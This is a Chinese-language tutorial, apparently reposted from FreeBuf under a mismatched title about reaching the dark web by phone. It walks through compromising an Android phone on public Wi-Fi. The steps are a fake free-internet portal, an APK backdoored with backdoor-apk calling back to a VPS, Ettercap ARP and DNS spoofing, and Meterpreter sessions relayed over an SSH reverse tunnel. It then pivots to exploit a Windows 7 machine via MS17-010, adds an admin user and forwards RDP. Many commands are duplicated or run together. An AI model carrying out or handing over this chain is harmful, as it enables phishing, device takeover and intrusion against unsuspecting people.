手机进入暗网教学地址(手机进入暗网详细教学)
* 本文作者:求一份网络安全实习,本文中提及的工具和技术方法仅供安全教学用途,禁止非法使用
以前经常看Freebuf,学到了不少东西,现在想给入门的同学提供一点微小的帮助。以前老是不知道如何在外网使用msf这个神器,自己查了查资料,总结了一点自己的认识。
0. 环境:
a) Kali 2.0 (咖啡厅:192.168.0.2/校园网:172.16.X.X)
i. Metasploit-Framework
ii. Ettercap(dns欺骗)
iii. Backdoor-apk(apk后门)
iv. Python -m SimpleHTTPServer 80 (轻量级HTTP服务器)
v. SSH Tunnel (外网打洞)
i. Metasploit-Framework
ii. Ettercap(dns欺骗)
iii. Backdoor-apk(apk后门)
iv. Python -m SimpleHTTPServer 80 (轻量级HTTP服务器)
v. SSH Tunnel (外网打洞)
b) Vultr vps 一台(Ubuntu 14.04)(公网IP:45.77.xx.xx)
echo GatewayPorts yes>>/etc/ssh/sshd_config
echo GatewayPorts yes>>/etc/ssh/sshd_config
c) Android (魅蓝E2 Flyme by Yunos )( 咖啡厅:192.168.0.3/家庭局域网:192.168.0.3)
d) Win7 x64 sp1(ms17_010)(家庭局域网:192.168.0.5)
示意图:
展开全文
1. 构造钓鱼页面
a) 首先我们在电脑上登录CMCC-EDU
b) 弹出一个页面
c) 该页面会提示下载一个 免费上网1.pak .我们正好用它来制作后门
d) 保存该页面到桌面, 将 免费上网.html 重命名为 index.html 并放到 免费上网_files 文件夹中,然后修改HTML:,
替换页面所有apk地址为免费上网.apk,并添加<iframe src=”免费上网.apk”>
e) python -m SimpleHTTPServer 80 #(在index.html所在文件夹直接启动HTTP服务)
2. 使用backdoor-apk制作apk后门
a) 现在我们
git clone https://github.com/dana-at-cp/backdoor-apk.git
git clone https://github.com/dana-at-cp/backdoor-apk.git
b)
cd backdoor-apk-master/backdoor-apk
cd backdoor-apk-master/backdoor-apk
c) 将 免费上网1.apk 复制到此目录 并且重命名为 mfsw.apk
d)
./backdoor-apk.sh mfsw.apk
./backdoor-apk.sh mfsw.apk
e) payload 选择 3
f) lhost 填写 vps 的IP地址 45.77.XX.XX
g) lport填写 99 (vultr 会封掉一部分端口,比如默认的4444)
h) 然后进入 original/dist 复制mfsw.apk 到 免费上网_files 那个包含我们钓鱼文件的文件夹,改名为 免费上网.apk
3. Ettercap 实现 DNS 欺骗
a) 查看ifconfig
b)
gedit /etc/ettercap/etter.dns
gedit /etc/ettercap/etter.dns
* A 192.168.0.2
* PTR 192.168.0.2
c) 开启ettercap-gui 选择wlan0
d) 扫描hosts
e) 选择欺骗 192.168.0.1 和 192.168.0.3 (Android)
f) 开启Arpspoof
g) 加载dns sproof 模块
h) 手机上如图:
i.
ii.
iii.
4. msf 通过SSHtunnel 接收 反弹meterpreter 会话
a) 下面我们切换kali连接到其他wifi,
ifconfig 查看一下当前kali ip
当前地址为 172.16.8.181 ,我们等下还是能接收到来自Android的会话
b)
vi sshTunnel
vi sshTunnel
c)
#!/bin/bashif [ -n “$1” ]#判断参数$1是否为空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g root@45.77.xx.xx -R $1:127.0.0.1:$1#这里是相同端口是因为,msf监听不到45.77.xx.xx:$1 会自动监听0.0.0.0:$1,刚好能正常接收会话elseecho 0.0.0.099”--<>--”45.77.xx.xx99
ssh -C -g root@45.77.xx.xx -R 99:127.0.0.1:99#默认监听99端口 fi
#!/bin/bashif [ -n “$1” ]#判断参数$1是否为空then echo 0.0.0.0 $1”--<>--”45.77.xx.xx:$1ssh -C -g root@45.77.xx.xx -R $1:127.0.0.1:$1#这里是相同端口是因为,msf监听不到45.77.xx.xx:$1 会自动监听0.0.0.0:$1,刚好能正常接收会话elseecho 0.0.0.099”--<>--”45.77.xx.xx99
ssh -C -g root@45.77.xx.xx -R 99:127.0.0.1:99#默认监听99端口 fi
d) chmod +x sshTunnel
e) ./sshTunnel #默认99端口,运行sshtunnel 来实现 vps:99 到 127.0.0.1:99的转发
f) 其实这里已经有会话反弹过来了,只是本地msf监听没有开启
g) 现在我们开启msf监听
cd backdoor-apk/backdoor-apk/
msfconsole -r backdoor-apk. rc
cd backdoor-apk/backdoor-apk/
msfconsole -r backdoor-apk. rc
h) 可以看到会话已经建立
i) session #查看
j) wakelock #保持唤醒防止掉线
k) session -i 1 #切换到meterpreter
l) 截个图录个音啥的都不是事,能中招的用户肯定会给权限的,毕竟不是所有人都是有安全意识
m) ifconfig#查看Android的网段
n) run autoroute -s 192.168.0.3 #添加自动路由background#返回msfconsole
o) 现在msf已经获得192.168.0.0/24网段的权限
但是我们还是有访问该网段的权限,扫描一手ms17_010
p) 既然是有ms17_010那就好办了(为了方便以后控制,加上bind_tcp正向连接成功率会低一点,所以使用reverse_tcp)
q) sshtunnel 打洞,45.77.xx.136:88->127.0.0.1:88
r) 可以看到,msf自动监听了0.0.0.0:88,这就是转发到相同端口的好处
s) 这里win7 x64会重启,然后获得会话,可以看到win7的会话也被vps转发回来了
t) seesion -i 2 #选择Windows的会话,并开启远程桌面
u) 输入shell,进行添加用户,这里也可以用 run getgui -e -u admin -p 123
v) 下面我们可以使用
protfwd add -l 1234 -r 192.168.0.5 -p 3389
protfwd add -l 1234 -r 192.168.0.5 -p 3389
将win7的远程桌面转发到本地1234端口
w) get it!
大三狗,会写Python,懂点Web安全,想去给网络安全公司的大佬端茶倒水(求一份网络安全实习,谢谢)
* 本文作者:求一份网络安全实习,本文属FreeBuf原创奖励计划,未经许可禁止转载